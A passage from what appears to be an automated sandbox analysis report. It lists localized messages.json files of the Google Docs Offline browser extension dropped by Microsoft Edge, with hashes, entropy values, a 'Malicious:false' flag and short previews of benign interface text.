                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\kk\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):3235
                                                                                                                                                                                                                                                                              Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                                                                              MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                                                                              SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                                                                              SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                                                                              SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\km\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):3122
                                                                                                                                                                                                                                                                              Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                                                                                              MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                                                                                              SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                                                                                                              SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                                                                                              SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\kn\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1895
                                                                                                                                                                                                                                                                              Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                                                                                              MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                                                                                              SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                                                                                                              SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                                                                                              SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\ko\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1042
                                                                                                                                                                                                                                                                              Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                                                                                              MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                                                                                                              SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                                                                                              SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                                                                                                              SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\lo\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):2535
                                                                                                                                                                                                                                                                              Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                                                                                              MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                                                                                              SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                                                                                                              SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                                                                                              SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\lt\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1028
                                                                                                                                                                                                                                                                              Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                                                                                              MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                                                                                                              SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                                                                                              SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                                                                                              SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\lv\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):994
                                                                                                                                                                                                                                                                              Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                                                                                                              MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                                                                                                              SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                                                                                                                              SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                                                                                                              SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\ml\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):2091
                                                                                                                                                                                                                                                                              Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                                                                                                                              MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                                                                                              SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                                                                                              SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                                                                                                              SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\mn\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):2778
                                                                                                                                                                                                                                                                              Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                                              MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                                              SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                                              SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                                              SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\mr\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1719
                                                                                                                                                                                                                                                                              Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                                                                              MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                                                                              SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                                                                              SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                                                                              SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\ms\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):936
                                                                                                                                                                                                                                                                              Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                                                                              MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                                              SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                                              SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                                              SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\my\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):3830
                                                                                                                                                                                                                                                                              Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                                              MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                                              SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                                              SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                                              SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7492_308212796\CRX_INSTALL\_locales\ne\messages.json

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1898
                                                                                                                                                                                                                                                                              Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                              Encrypted:false
